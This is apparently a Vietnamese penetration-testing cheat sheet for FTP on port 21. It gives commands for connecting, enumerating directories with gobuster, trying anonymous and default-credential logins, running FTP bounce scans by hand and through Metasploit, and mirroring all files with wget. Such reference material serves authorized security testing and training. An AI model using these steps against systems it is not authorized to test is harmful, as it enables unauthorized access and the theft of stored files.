FTP (Port 21)
Connect
ftp
Kết nối tới máy chủ FTP tại <ip> và cổng <port> :
ftp <ip> <port>
lftp
Sử dụng lftp, phiên bản cải tiến của ftp :
lftp <ip>
URL
Truy cập máy chủ FTP qua trình duyệt với URL:
ftp://<user>:<pass>@<ip>
Enumeration
Kiểm tra thư mục mặc định và phổ biến
Tìm thư mục chứa thông tin nhạy cảm bằng gobuster :
gobuster dir -u ftp://<ip> -w <wordlist>
Attack Vectors
Đăng nhập ẩn danh
Sử dụng tài khoản anonymous với bất kỳ mật khẩu nào:
ftp <ip>
Đăng nhập với thông tin mặc định
Thử các tài khoản/mật khẩu như admin, administrator, root, ftpuser, test :
ftp <ip>
Tấn công FTP Bounce
Chuyển hướng dữ liệu qua máy chủ FTP bằng lệnh PORT.
Thực hiện FTP Bounce
- Kết nối tới máy chủ FTP:
ftp <ip>
- Chuyển hướng dữ liệu:
quote PORT <target_ip>,<port>
- Khởi tạo truyền tệp:
get <file>
Bounce bằng Metasploit
Quét cổng mở qua máy chủ FTP:
msf> use auxiliary/scanner/ftp/ftp_bounce
> set RHOSTS <ftp_server>
> set RPORT <port>
> run
Post-Exploitation
Các câu FTP thông dụng
| Lệnh | Mô tả | Cách dùng |
lcd | Thay đổi thư mục cục bộ | lcd /path/to/directory |
cd | Thay đổi thư mục trên máy chủ | cd /path/to/directory |
ls | Liệt kê các tệp trên máy chủ | ls |
get | Tải tệp từ máy chủ về | get filename.txt |
mget | Tải nhiều tệp từ máy chủ về | mget *.txt |
put | Tải tệp lên máy chủ | put filename.txt |
mput | Tải nhiều tệp lên máy chủ | mput *.txt |
bin | Đặt chế độ truyền nhị phân | bin |
ascii | Đặt chế độ truyền ASCII | ascii |
quit | Thoát khỏi ứng dụng FTP | quit |
Tải xuống tất cả các file
wget -m ftp://<user>:<pass>@<ip>